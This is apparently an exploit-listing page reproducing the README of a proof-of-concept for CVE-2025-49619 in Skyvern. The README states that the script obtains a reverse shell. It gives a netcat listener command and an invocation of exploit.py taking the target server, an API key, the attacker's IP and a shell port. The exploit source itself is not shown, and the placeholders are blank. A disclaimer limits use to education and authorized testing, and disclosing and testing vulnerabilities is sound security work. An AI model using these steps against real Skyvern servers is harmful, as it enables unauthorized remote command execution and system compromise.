Sploitus

Exploit for CVE-2025-49619

githubexploit Β· 2025-06-09

Exploit Code

README40 lines
## https://sploitus.com/exploit?id=A6ADD150-2DFB-52E4-9E33-F1E36F470C44
# CVE-2025-49619 PoC

---

**This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.**

---

## Author

- **Name:** Cristian Branet  
- **GitHub:** [cristibtz](https://github.com/cristibtz)

---

## Usage

### 1. Start a listener

```bash
nc -lvnp 
```

### 2. Run the exploit

```bash
python3 exploit.py -u "http://:" -k "" -i  -p 
```

- ``: Skyvern server IP
- ``: Skyvern server port
- ``: Your Skyvern API key (Settings β†’ API Key)
- ``: Your IP to receive the reverse shell
- ``: Port for the reverse shell (must match your listener)

---

**Disclaimer:**  
This code is for educational and authorized testing purposes only.